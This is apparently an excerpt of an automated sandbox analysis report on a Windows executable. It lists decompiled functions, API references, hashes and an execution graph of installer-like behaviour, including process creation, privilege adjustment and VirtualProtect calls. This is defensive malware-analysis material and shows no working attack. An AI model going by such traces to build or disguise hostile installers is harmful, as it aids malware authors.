					 *0x49e908 = E0042C4FC(2, _t14, _t16, _t17, _t18);
					_t19 =  *0x49e908(_t14, _t17);
				}
				return _t19;
			}












                                                                                                                                                                                                                            0x0042c672
                                                                                                                                                                                                                            0x0042c675
                                                                                                                                                                                                                            0x0042c67f
                                                                                                                                                                                                                            0x0042c6a4
                                                                                                                                                                                                                            0x0042c6ad
                                                                                                                                                                                                                            0x0042c6d4
                                                                                                                                                                                                                            0x0042c6d4
                                                                                                                                                                                                                            0x0042c681
                                                                                                                                                                                                                            0x0042c686
                                                                                                                                                                                                                            0x0042c693
                                                                                                                                                                                                                            0x0042c6a0
                                                                                                                                                                                                                            0x0042c6a0
                                                                                                                                                                                                                            0x0042c6df

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C6BD
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C6C9
                                                                                                                                                                                                                              • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MetricsSystem$AddressProc
                                                                                                                                                                                                                            • String ID: MonitorFromRect
                                                                                                                                                                                                                            • API String ID: 1792783759-4033241945
                                                                                                                                                                                                                            • Opcode ID: 0505ff08604382a2a7a56eddc592a15d0ad7eb215b3b37d6f2a53d4f1b45624d
                                                                                                                                                                                                                            • Instruction ID: ff17a17d24a28b56e0f59b29e5112e5d3ba35734792e5f6c57e17e57efd49fd6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0505ff08604382a2a7a56eddc592a15d0ad7eb215b3b37d6f2a53d4f1b45624d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1601A771301128ABD760CB05F8C9B1A7755E764361F845077E805CB246C778EC40CBAC
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0044AE70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0044AE70(void* __eax) {
				void* _t16;
				intOrPtr _t17;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x34)) == 0) {
					_t17 =  *0x449b38; // 0x449b84
					if(E00403D78( *((intOrPtr*)(__eax + 4)), _t17) == 0) {
						 *((intOrPtr*)(_t16 + 0x34)) = CreateMenu();
					} else {
						 *((intOrPtr*)(_t16 + 0x34)) = CreatePopupMenu();
					}
					if( *((intOrPtr*)(_t16 + 0x34)) == 0) {
						E00449F18();
					}
					E0044AC00(_t16);
				}
				return  *((intOrPtr*)(_t16 + 0x34));
			}





                                                                                                                                                                                                                            0x0044ae71
                                                                                                                                                                                                                            0x0044ae77
                                                                                                                                                                                                                            0x0044ae7c
                                                                                                                                                                                                                            0x0044ae89
                                                                                                                                                                                                                            0x0044ae9a
                                                                                                                                                                                                                            0x0044ae8b
                                                                                                                                                                                                                            0x0044ae90
                                                                                                                                                                                                                            0x0044ae90
                                                                                                                                                                                                                            0x0044aea1
                                                                                                                                                                                                                            0x0044aea8
                                                                                                                                                                                                                            0x0044aea8
                                                                                                                                                                                                                            0x0044aeaf
                                                                                                                                                                                                                            0x0044aeaf
                                                                                                                                                                                                                            0x0044aeb8

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreatePopupMenu.USER32(?,0044AB77,00000000,00000000,0044ABBB), ref: 0044AE8B
                                                                                                                                                                                                                            • CreateMenu.USER32(?,0044AB77,00000000,00000000,0044ABBB), ref: 0044AE95
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateMenu$Popup
                                                                                                                                                                                                                            • String ID: .B
                                                                                                                                                                                                                            • API String ID: 257293969-2011479308
                                                                                                                                                                                                                            • Opcode ID: 0806c6a46482751433e2ade30357662471cd1d52e2604d1811d61facdbb405b4
                                                                                                                                                                                                                            • Instruction ID: ec3ec204bd3e4010e8879658da88cb666e7af430c2d7f16cc051fc7c4e83f06b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0806c6a46482751433e2ade30357662471cd1d52e2604d1811d61facdbb405b4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BFE06D306822008FEB50EF65DAC564A3BA8AF05309F9034BAA8119F347C738DC958B5A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                            Execution Coverage:20.6%
                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                            Signature Coverage:7.7%
                                                                                                                                                                                                                            Total number of Nodes:1623
                                                                                                                                                                                                                            Total number of Limit Nodes:45
                                                                                                                                                                                                                            execution_graph 4217 403640 SetErrorMode GetVersionExW 4218 403692 GetVersionExW 4217->4218 4219 4036ca 4217->4219 4218->4219 4220 403723 4219->4220 4221 406a35 5 API calls 4219->4221 4308 4069c5 GetSystemDirectoryW 4220->4308 4221->4220 4223 403739 lstrlenA 4223->4220 4224 403749 4223->4224 4311 406a35 GetModuleHandleA 4224->4311 4227 406a35 5 API calls 4228 403757 4227->4228 4229 406a35 5 API calls 4228->4229 4230 403763 #17 OleInitialize SHGetFileInfoW 4229->4230 4317 406668 lstrcpynW 4230->4317 4233 4037b0 GetCommandLineW 4318 406668 lstrcpynW 4233->4318 4235 4037c2 4319 405f64 4235->4319 4238 4038f7 4239 40390b GetTempPathW 4238->4239 4323 40360f 4239->4323 4241 403923 4243 403927 GetWindowsDirectoryW lstrcatW 4241->4243 4244 40397d DeleteFileW 4241->4244 4242 405f64 CharNextW 4246 4037f9 4242->4246 4247 40360f 12 API calls 4243->4247 4333 4030d0 GetTickCount GetModuleFileNameW 4244->4333 4246->4238 4246->4242 4251 4038f9 4246->4251 4249 403943 4247->4249 4248 403990 4252 403a54 4248->4252 4254 403a45 4248->4254 4258 405f64 CharNextW 4248->4258 4249->4244 4250 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4249->4250 4253 40360f 12 API calls 4250->4253 4419 406668 lstrcpynW 4251->4419 4473 403c25 4252->4473 4257 403975 4253->4257 4363 403d17 4254->4363 4257->4244 4257->4252 4275 4039b2 4258->4275 4261 403b91 4264 403b99 GetCurrentProcess OpenProcessToken 4261->4264 4265 403c0f ExitProcess 4261->4265 4262 403b7c 4482 405cc8 4262->4482 4269 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 4264->4269 4270 403bdf 4264->4270 4266 403a1b 4420 40603f 4266->4420 4267 403a5c 4436 405c33 4267->4436 4269->4270 4273 406a35 5 API calls 4270->4273 4277 403be6 4273->4277 4275->4266 4275->4267 4279 403bfb ExitWindowsEx 4277->4279 4284 403c08 4277->4284 4279->4265 4279->4284 4280 403a72 lstrcatW 4281 403a7d lstrcatW lstrcmpiW 4280->4281 4281->4252 4282 403a9d 4281->4282 4285 403aa2 4282->4285 4286 403aa9 4282->4286 4486 40140b 4284->4486 4439 405b99 CreateDirectoryW 4285->4439 4444 405c16 CreateDirectoryW 4286->4444 4287 403a3a 4435 406668 lstrcpynW 4287->4435 4293 403aae SetCurrentDirectoryW 4294 403ac0 4293->4294 4295 403acb 4293->4295 4447 406668 lstrcpynW 4294->4447 4448 406668 lstrcpynW 4295->4448 4300 403b19 CopyFileW 4305 403ad8 4300->4305 4301 403b63 4303 406428 36 API calls 4301->4303 4303->4252 4304 4066a5 17 API calls 4304->4305 4305->4301 4305->4304 4307 403b4d CloseHandle 4305->4307 4449 4066a5 4305->4449 4466 406428 MoveFileExW 4305->4466 4470 405c4b CreateProcessW 4305->4470 4307->4305 4309 4069e7 wsprintfW LoadLibraryExW 4308->4309 4309->4223 4312 406a51 4311->4312 4313 406a5b GetProcAddress 4311->4313 4314 4069c5 3 API calls 4312->4314 4315 403750 4313->4315 4316 406a57 4314->4316 4315->4227 4316->4313 4316->4315 4317->4233 4318->4235 4320 405f6a 4319->4320 4321 4037e8 CharNextW 4320->4321 4322 405f71 CharNextW 4320->4322 4321->4246 4322->4320 4489 4068ef 4323->4489 4325 403625 4325->4241 4326 40361b 4326->4325 4498 405f37 lstrlenW CharPrevW 4326->4498 4329 405c16 2 API calls 4330 403633 4329->4330 4501 406187 4330->4501 4505 406158 GetFileAttributesW CreateFileW 4333->4505 4335 403113 4362 403120 4335->4362 4506 406668 lstrcpynW 4335->4506 4337 403136 4507 405f83 lstrlenW 4337->4507 4341 403147 GetFileSize 4342 403241 4341->4342 4347 40315e 4341->4347 4512 40302e 4342->4512 4346 403286 GlobalAlloc 4350 40329d 4346->4350 4347->4342 4349 4032de 4347->4349 4357 40302e 32 API calls 4347->4357 4347->4362 4543 4035e2 4347->4543 4351 40302e 32 API calls 4349->4351 4353 406187 2 API calls 4350->4353 4351->4362 4352 403267 4354 4035e2 ReadFile 4352->4354 4355 4032ae CreateFileW 4353->4355 4356 403272 4354->4356 4358 4032e8 4355->4358 4355->4362 4356->4346 4356->4362 4357->4347 4527 4035f8 SetFilePointer 4358->4527 4360 4032f6 4528 403371 4360->4528 4362->4248 4362->4362 4364 406a35 5 API calls 4363->4364 4365 403d2b 4364->4365 4366 403d31 4365->4366 4367 403d43 4365->4367 4605 4065af wsprintfW 4366->4605 4606 406536 4367->4606 4371 403d92 lstrcatW 4372 403d41 4371->4372 4590 403fed 4372->4590 4373 406536 3 API calls 4373->4371 4376 40603f 18 API calls 4377 403dc4 4376->4377 4378 403e58 4377->4378 4380 406536 3 API calls 4377->4380 4379 40603f 18 API calls 4378->4379 4381 403e5e 4379->4381 4382 403df6 4380->4382 4383 403e6e LoadImageW 4381->4383 4384 4066a5 17 API calls 4381->4384 4382->4378 4387 403e17 lstrlenW 4382->4387 4391 405f64 CharNextW 4382->4391 4385 403f14 4383->4385 4386 403e95 RegisterClassW 4383->4386 4384->4383 4390 40140b 2 API calls 4385->4390 4388 403f1e 4386->4388 4389 403ecb SystemParametersInfoW CreateWindowExW 4386->4389 4392 403e25 lstrcmpiW 4387->4392 4393 403e4b 4387->4393 4388->4252 4389->4385 4394 403f1a 4390->4394 4395 403e14 4391->4395 4392->4393 4396 403e35 GetFileAttributesW 4392->4396 4397 405f37 3 API calls 4393->4397 4394->4388 4399 403fed 18 API calls 4394->4399 4395->4387 4398 403e41 4396->4398 4400 403e51 4397->4400 4398->4393 4401 405f83 2 API calls 4398->4401 4402 403f2b 4399->4402 4611 406668 lstrcpynW 4400->4611 4401->4393 4404 403f37 ShowWindow 4402->4404 4405 403fba 4402->4405 4406 4069c5 3 API calls 4404->4406 4598 40579d OleInitialize 4405->4598 4408 403f4f 4406->4408 4410 403f5d GetClassInfoW 4408->4410 4412 4069c5 3 API calls 4408->4412 4409 403fc0 4411 403fdc 4409->4411 4416 403fc4 4409->4416 4414 403f71 GetClassInfoW RegisterClassW 4410->4414 4415 403f87 DialogBoxParamW 4410->4415 4413 40140b 2 API calls 4411->4413 4412->4410 4413->4388 4414->4415 4418 40140b 2 API calls 4415->4418 4416->4388 4417 40140b 2 API calls 4416->4417 4417->4388 4418->4388 4419->4239 4627 406668 lstrcpynW 4420->4627 4422 406050 4628 405fe2 CharNextW CharNextW 4422->4628 4425 403a27 4425->4252 4434 406668 lstrcpynW 4425->4434 4426 4068ef 5 API calls 4432 406066 4426->4432 4427 406097 lstrlenW 4428 4060a2 4427->4428 4427->4432 4429 405f37 3 API calls 4428->4429 4431 4060a7 GetFileAttributesW 4429->4431 4431->4425 4432->4425 4432->4427 4433 405f83 2 API calls 4432->4433 4634 40699e FindFirstFileW 4432->4634 4433->4427 4434->4287 4435->4254 4437 406a35 5 API calls 4436->4437 4438 403a61 lstrcatW 4437->4438 4438->4280 4438->4281 4440 403aa7 4439->4440 4441 405bea GetLastError 4439->4441 4440->4293 4441->4440 4442 405bf9 SetFileSecurityW 4441->4442 4442->4440 4443 405c0f GetLastError 4442->4443 4443->4440 4445 405c26 4444->4445 4446 405c2a GetLastError 4444->4446 4445->4293 4446->4445 4447->4295 4448->4305 4460 4066b2 4449->4460 4450 4068d5 4451 403b0d DeleteFileW 4450->4451 4639 406668 lstrcpynW 4450->4639 4451->4300 4451->4305 4453 4068a3 lstrlenW 4453->4460 4456 406536 3 API calls 4456->4460 4457 4066a5 10 API calls 4457->4453 4458 4067ba GetSystemDirectoryW 4458->4460 4459 4067cd GetWindowsDirectoryW 4459->4460 4460->4450 4460->4453 4460->4456 4460->4457 4460->4458 4460->4459 4461 4067fc SHGetSpecialFolderLocation 4460->4461 4462 4066a5 10 API calls 4460->4462 4463 406844 lstrcatW 4460->4463 4464 4068ef 5 API calls 4460->4464 4637 4065af wsprintfW 4460->4637 4638 406668 lstrcpynW 4460->4638 4461->4460 4465 406814 SHGetPathFromIDListW CoTaskMemFree 4461->4465 4462->4460 4463->4460 4464->4460 4465->4460 4467 406449 4466->4467 4468 40643c 4466->4468 4467->4305 4640 4062ae 4468->4640 4471 405c8a 4470->4471 4472 405c7e CloseHandle 4470->4472 4471->4305 4472->4471 4474 403c40 4473->4474 4475 403c36 CloseHandle 4473->4475 4476 403c54 4474->4476 4477 403c4a CloseHandle 4474->4477 4475->4474 4674 403c82 4476->4674 4477->4476 4483 405cdd 4482->4483 4484 403b89 ExitProcess 4483->4484 4485 405cf1 MessageBoxIndirectW 4483->4485 4485->4484 4487 401389 2 API calls 4486->4487 4488 401420 4487->4488 4488->4265 4496 4068fc 4489->4496 4490 406972 4491 406977 CharPrevW 4490->4491 4493 406998 4490->4493 4491->4490 4492 406965 CharNextW 4492->4490 4492->4496 4493->4326 4494 405f64 CharNextW 4494->4496 4495 406951 CharNextW 4495->4496 4496->4490 4496->4492 4496->4494 4496->4495 4497 406960 CharNextW 4496->4497 4497->4492 4499 405f53 lstrcatW 4498->4499 4500 40362d 4498->4500 4499->4500 4500->4329 4502 406194 GetTickCount GetTempFileNameW 4501->4502 4503 40363e 4502->4503 4504 4061ca 4502->4504 4503->4241 4504->4502 4504->4503 4505->4335 4506->4337 4508 405f91 4507->4508 4509 40313c 4508->4509 4510 405f97 CharPrevW 4508->4510 4511 406668 lstrcpynW 4509->4511 4510->4508 4510->4509 4511->4341 4513 403057 4512->4513 4514 40303f 4512->4514 4516 403067 GetTickCount 4513->4516 4517 40305f 4513->4517 4515 403048 DestroyWindow 4514->4515 4518 40304f 4514->4518 4515->4518 4516->4518 4520 403075 4516->4520 4547 406a71 4517->4547 4518->4346 4518->4362 4546 4035f8 SetFilePointer 4518->4546 4521 4030aa CreateDialogParamW ShowWindow 4520->4521 4522 40307d 4520->4522 4521->4518 4522->4518 4551 403012 4522->4551 4524 40308b wsprintfW 4554 4056ca 4524->4554 4527->4360 4529 403380 SetFilePointer 4528->4529 4530 40339c 4528->4530 4529->4530 4565 403479 GetTickCount 4530->4565 4535 403479 42 API calls 4536 4033d3 4535->4536 4537 403439 4536->4537 4538 40343f ReadFile 4536->4538 4540 4033e2 4536->4540 4537->4362 4538->4537 4540->4537 4541 4061db ReadFile 4540->4541 4580 40620a WriteFile 4540->4580 4541->4540 4544 4061db ReadFile 4543->4544 4545 4035f5 4544->4545 4545->4347 4546->4352 4548 406a8e PeekMessageW 4547->4548 4549 406a84 DispatchMessageW 4548->4549 4550 406a9e 4548->4550 4549->4548 4550->4518 4552 403021 4551->4552 4553 403023 MulDiv 4551->4553 4552->4553 4553->4524 4555 4056e5 4554->4555 4564 4030a8 4554->4564 4556 405701 lstrlenW 4555->4556 4559 4066a5 17 API calls 4555->4559 4557 40572a 4556->4557 4558 40570f lstrlenW 4556->4558 4561 405730 SetWindowTextW 4557->4561 4562 40573d 4557->4562 4560 405721 lstrcatW 4558->4560 4558->4564 4559->4556 4560->4557 4561->4562 4563 405743 SendMessageW SendMessageW SendMessageW 4562->4563 4562->4564 4563->4564 4564->4518 4566 4035d1 4565->4566 4567 4034a7 4565->4567 4569 40302e 32 API calls 4566->4569 4582 4035f8 SetFilePointer 4567->4582 4570 4033a3 4569->4570 4570->4537 4578 4061db ReadFile 4570->4578 4571 4034b2 SetFilePointer 4575 4034d7 4571->4575 4572 4035e2 ReadFile 4572->4575 4574 40302e 32 API calls 4574->4575 4575->4570 4575->4572 4575->4574 4576 40620a WriteFile 4575->4576 4577 4035b2 SetFilePointer 4575->4577 4583 406bb0 4575->4583 4576->4575 4577->4566 4579 4033bc 4578->4579 4579->4535 4579->4537 4581 406228 4580->4581 4581->4540 4582->4571 4584 406bd5 4583->4584 4587 406bdd 4583->4587 4584->4575 4585 406c64 GlobalFree 4586 406c6d GlobalAlloc 4585->4586 4586->4584 4586->4587 4587->4584 4587->4585 4587->4586 4588 406ce4 GlobalAlloc 4587->4588 4589 406cdb GlobalFree 4587->4589 4588->4584 4588->4587 4589->4588 4591 404001 4590->4591 4612 4065af wsprintfW 4591->4612 4593 404072 4613 4040a6 4593->4613 4595 403da2 4595->4376 4596 404077 4596->4595 4597 4066a5 17 API calls 4596->4597 4597->4596 4616 404610 4598->4616 4600 4057e7 4602 404610 SendMessageW 4600->4602 4601 4057c0 4601->4600 4619 401389 4601->4619 4603 4057f9 OleUninitialize 4602->4603 4603->4409 4605->4372 4623 4064d5 4606->4623 4609 40656a RegQueryValueExW RegCloseKey 4610 403d73 4609->4610 4610->4371 4610->4373 4611->4378 4612->4593 4614 4066a5 17 API calls 4613->4614 4615 4040b4 SetWindowTextW 4614->4615 4615->4596 4617 404628 4616->4617 4618 404619 SendMessageW 4616->4618 4617->4601 4618->4617 4621 401390 4619->4621 4620 4013fe 4620->4601 4621->4620 4622 4013cb MulDiv SendMessageW 4621->4622 4622->4621 4624 4064e4 4623->4624 4625 4064e8 4624->4625 4626 4064ed RegOpenKeyExW 4624->4626 4625->4609 4625->4610 4626->4625 4627->4422 4629 405fff 4628->4629 4633 406011 4628->4633 4631 40600c CharNextW 4629->4631 4629->4633 4630 406035 4630->4425 4630->4426 4631->4630 4632 405f64 CharNextW 4632->4633 4633->4630 4633->4632 4635 4069b4 FindClose 4634->4635 4636 4069bf 4634->4636 4635->4636 4636->4432 4637->4460 4638->4460 4639->4451 4641 406304 GetShortPathNameW 4640->4641 4642 4062de 4640->4642 4644 406423 4641->4644 4645 406319 4641->4645 4667 406158 GetFileAttributesW CreateFileW 4642->4667 4644->4467 4645->4644 4647 406321 wsprintfA 4645->4647 4646 4062e8 CloseHandle GetShortPathNameW 4646->4644 4648 4062fc 4646->4648 4649 4066a5 17 API calls 4647->4649 4648->4641 4648->4644 4650 406349 4649->4650 4668 406158 GetFileAttributesW CreateFileW 4650->4668 4652 406356 4652->4644 4653 406365 GetFileSize GlobalAlloc 4652->4653 4654 406387 4653->4654 4655 40641c CloseHandle 4653->4655 4656 4061db ReadFile 4654->4656 4655->4644 4657 40638f 4656->4657 4657->4655 4669 4060bd lstrlenA 4657->4669 4660 4063a6 lstrcpyA 4663 4063c8 4660->4663 4661 4063ba 4662 4060bd 4 API calls 4661->4662 4662->4663 4664 4063ff SetFilePointer 4663->4664 4665 40620a WriteFile 4664->4665 4666 406415 GlobalFree 4665->4666 4666->4655 4667->4646 4668->4652 4670 4060fe lstrlenA 4669->4670 4671 4060d7 lstrcmpiA 4670->4671 4673 406106 4670->4673 4672 4060f5 CharNextA 4671->4672 4671->4673 4672->4670 4673->4660 4673->4661 4675 403c90 4674->4675 4676 403c59 4675->4676 4677 403c95 FreeLibrary GlobalFree 4675->4677 4678 405d74 4676->4678 4677->4676 4677->4677 4679 40603f 18 API calls 4678->4679 4680 405d94 4679->4680 4681 405db3 4680->4681 4682 405d9c DeleteFileW 4680->4682 4684 405ede 4681->4684 4718 406668 lstrcpynW 4681->4718 4683 403b71 OleUninitialize 4682->4683 4683->4261 4683->4262 4684->4683 4691 40699e 2 API calls 4684->4691 4686 405dd9 4687 405dec 4686->4687 4688 405ddf lstrcatW 4686->4688 4690 405f83 2 API calls 4687->4690 4689 405df2 4688->4689 4692 405e02 lstrcatW 4689->4692 4693 405df8 4689->4693 4690->4689 4694 405ef8 4691->4694 4695 405e0d lstrlenW FindFirstFileW 4692->4695 4693->4692 4693->4695 4694->4683 4696 405efc 4694->4696 4697 405ed3 4695->4697 4716 405e2f 4695->4716 4698 405f37 3 API calls 4696->4698 4697->4684 4699 405f02 4698->4699 4700 405d2c 5 API calls 4699->4700 4703 405f0e 4700->4703 4702 405eb6 FindNextFileW 4704 405ecc FindClose 4702->4704 4702->4716 4705 405f12 4703->4705 4706 405f28 4703->4706 4704->4697 4705->4683 4709 4056ca 24 API calls 4705->4709 4708 4056ca 24 API calls 4706->4708 4708->4683 4711 405f1f 4709->4711 4710 405d74 60 API calls 4710->4716 4713 406428 36 API calls 4711->4713 4712 4056ca 24 API calls 4712->4702 4714 405f26 4713->4714 4714->4683 4715 4056ca 24 API calls 4715->4716 4716->4702 4716->4710 4716->4712 4716->4715 4717 406428 36 API calls 4716->4717 4719 406668 lstrcpynW 4716->4719 4720 405d2c 4716->4720 4717->4716 4718->4686 4719->4716 4728 406133 GetFileAttributesW 4720->4728 4723 405d59 4723->4716 4724 405d47 RemoveDirectoryW 4726 405d55 4724->4726 4725 405d4f DeleteFileW 4725->4726 4726->4723 4727 405d65 SetFileAttributesW 4726->4727 4727->4723 4729 405d38 4728->4729 4730 406145 SetFileAttributesW 4728->4730 4729->4723 4729->4724 4729->4725 4730->4729 4731 687e2a7f 4732 687e2acf 4731->4732 4733 687e2a8f VirtualProtect 4731->4733 4733->4732 4734 401941 4735 401943 4734->4735 4740 402da6 4735->4740 4738 405d74 67 API calls 4739 401951 4738->4739 4741 402db2 4740->4741 4742 4066a5 17 API calls 4741->4742 4743 402dd3 4742->4743 4744 401948 4743->4744 4745 4068ef 5 API calls 4743->4745 4744->4738 4745->4744 4746 4015c1 4747 402da6 17 API calls 4746->4747 4748 4015c8 4747->4748 4749 405fe2 4 API calls 4748->4749 4759 4015d1 4749->4759 4750 401631 4752 401663 4750->4752 4753 401636 4750->4753 4751 405f64 CharNextW 4751->4759 4755 401423 24 API calls 4752->4755 4765 401423 4753->4765 4762 40165b 4755->4762 4757 405c16 2 API calls 4757->4759 4759->4750 4759->4751 4759->4757 4760 405c33 5 API calls 4759->4760 4763 401617 GetFileAttributesW 4759->4763 4764 405b99 4 API calls 4759->4764 4760->4759 4761 40164a SetCurrentDirectoryW 4761->4762 4763->4759 4764->4759 4766 4056ca 24 API calls 4765->4766 4767 401431 4766->4767 4768 406668 lstrcpynW 4767->4768 4768->4761 4769 401c43 4791 402d84 4769->4791 4771 401c4a 4772 402d84 17 API calls 4771->4772 4773 401c57 4772->4773 4774 401c6c 4773->4774 4775 402da6 17 API calls 4773->4775 4778 402da6 17 API calls 4774->4778 4781 401c7c 4774->4781 4775->4774 4776 401cd3 4780 402da6 17 API calls 4776->4780 4777 401c87 4779 402d84 17 API calls 4777->4779 4778->4781 4782 401c8c 4779->4782 4783 401cd8 4780->4783 4781->4776 4781->4777 4784 402d84 17 API calls 4782->4784 4785 402da6 17 API calls 4783->4785 4786 401c98 4784->4786 4787 401ce1 FindWindowExW 4785->4787 4788 401cc3 SendMessageW 4786->4788 4789 401ca5 SendMessageTimeoutW 4786->4789 4790 401d03 4787->4790 4788->4790 4789->4790 4792 4066a5 17 API calls 4791->4792 4793 402d99 4792->4793 4793->4771 5359 4028c4 5360 4028ca 5359->5360 5361 4028d2 FindClose 5360->5361 5362 402c2a 5360->5362 5361->5362 4819 4040c5 4820 4040dd 4819->4820 4821 40423e 4819->4821 4820->4821 4824 4040e9 4820->4824 4822 40428f 4821->4822 4823 40424f GetDlgItem GetDlgItem 4821->4823 4826 4042e9 4822->4826 4838 401389 2 API calls 4822->4838 4892 4045c4 4823->4892 4827 4040f4 SetWindowPos 4824->4827 4828 404107 4824->4828 4830 404610 SendMessageW 4826->4830 4848 404239 4826->4848 4827->4828 4831 404110 ShowWindow 4828->4831 4832 404152 4828->4832 4829 404279 KiUserCallbackDispatcher 4835 40140b 2 API calls 4829->4835 4860 4042fb 4830->4860 4833 404130 GetWindowLongW 4831->4833 4834 40422b 4831->4834 4836 404171 4832->4836 4837 40415a DestroyWindow 4832->4837 4833->4834 4839 404149 ShowWindow 4833->4839 4901 40462b 4834->4901 4835->4822 4840 404176 SetWindowLongW 4836->4840 4841 404187 4836->4841 4891 40454d 4837->4891 4842 4042c1 4838->4842 4839->4832 4840->4848 4841->4834 4846 404193 GetDlgItem 4841->4846 4842->4826 4847 4042c5 SendMessageW 4842->4847 4844 40140b 2 API calls 4844->4860 4845 40454f DestroyWindow EndDialog 4845->4891 4850 4041c1 4846->4850 4851 4041a4 SendMessageW IsWindowEnabled 4846->4851 4847->4848 4849 40457e ShowWindow 4849->4848 4853 4041ce 4850->4853 4855 404215 SendMessageW 4850->4855 4856 4041e1 4850->4856 4864 4041c6 4850->4864 4851->4848 4851->4850 4852 4066a5 17 API calls 4852->4860 4853->4855 4853->4864 4855->4834 4857 4041e9 4856->4857 4858 4041fe 4856->4858 4861 40140b 2 API calls 4857->4861 4862 40140b 2 API calls 4858->4862 4859 4041fc 4859->4834 4860->4844 4860->4845 4860->4848 4860->4852 4863 4045c4 18 API calls 4860->4863 4866 4045c4 18 API calls 4860->4866 4882 40448f DestroyWindow 4860->4882 4861->4864 4865 404205 4862->4865 4863->4860 4898 40459d 4864->4898 4865->4834 4865->4864 4867 404376 GetDlgItem 4866->4867 4868 404393 ShowWindow KiUserCallbackDispatcher 4867->4868 4869 40438b 4867->4869 4895 4045e6 KiUserCallbackDispatcher 4868->4895 4869->4868 4871 4043bd EnableWindow 4876 4043d1 4871->4876 4872 4043d6 GetSystemMenu EnableMenuItem SendMessageW 4873 404406 SendMessageW 4872->4873 4872->4876 4873->4876 4875 4040a6 18 API calls 4875->4876 4876->4872 4876->4875 4896 4045f9 SendMessageW 4876->4896 4897 406668 lstrcpynW 4876->4897 4878 404435 lstrlenW 4879 4066a5 17 API calls 4878->4879 4880 40444b SetWindowTextW 4879->4880 4881 401389 2 API calls 4880->4881 4881->4860 4883 4044a9 CreateDialogParamW 4882->4883 4882->4891 4884 4044dc 4883->4884 4883->4891 4885 4045c4 18 API calls 4884->4885 4886 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4885->4886 4887 401389 2 API calls 4886->4887 4888 40452d 4887->4888 4888->4848 4889 404535 ShowWindow 4888->4889 4890 404610 SendMessageW 4889->4890 4890->4891 4891->4848 4891->4849 4893 4066a5 17 API calls 4892->4893 4894 4045cf SetDlgItemTextW 4893->4894 4894->4829 4895->4871 4896->4876 4897->4878 4899 4045a4 4898->4899 4900 4045aa SendMessageW 4898->4900 4899->4900 4900->4859 4902 4046ee 4901->4902 4903 404643 GetWindowLongW 4901->4903 4902->4848 4903->4902 4904 404658 4903->4904 4904->4902 4905 404685 GetSysColor 4904->4905 4906 404688 4904->4906 4905->4906 4907 404698 SetBkMode 4906->4907 4908 40468e SetTextColor 4906->4908 4909 4046b0 GetSysColor 4907->4909 4910 4046b6 4907->4910 4908->4907 4909->4910 4911 4046c7 4910->4911 4912 4046bd SetBkColor 4910->4912 4911->4902 4913 4046e1 CreateBrushIndirect 4911->4913 4914 4046da DeleteObject 4911->4914 4912->4911 4913->4902 4914->4913 5363 687e1979 5364 687e199c 5363->5364 5365 687e19d1 GlobalFree 5364->5365 5366 687e19e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5364->5366 5365->5366 5367 687e1312 2 API calls 5366->5367 5368 687e1b6e GlobalFree GlobalFree 5367->5368 5369 687e1774 5370 687e17a3 5369->5370 5371 687e1bff 22 API calls 5370->5371 5372 687e17aa 5371->5372 5373 687e17bd 5372->5373 5374 687e17b1 5372->5374 5375 687e17c7 5373->5375 5376 687e17e4 5373->5376 5377 687e1312 2 API calls 5374->5377 5378 687e15dd 3 API calls 5375->5378 5379 687e180e 5376->5379 5380 687e17ea 5376->5380 5381 687e17bb 5377->5381 5383 687e17cc 5378->5383 5382 687e15dd 3 API calls 5379->5382 5384 687e1654 3 API calls 5380->5384 5382->5381 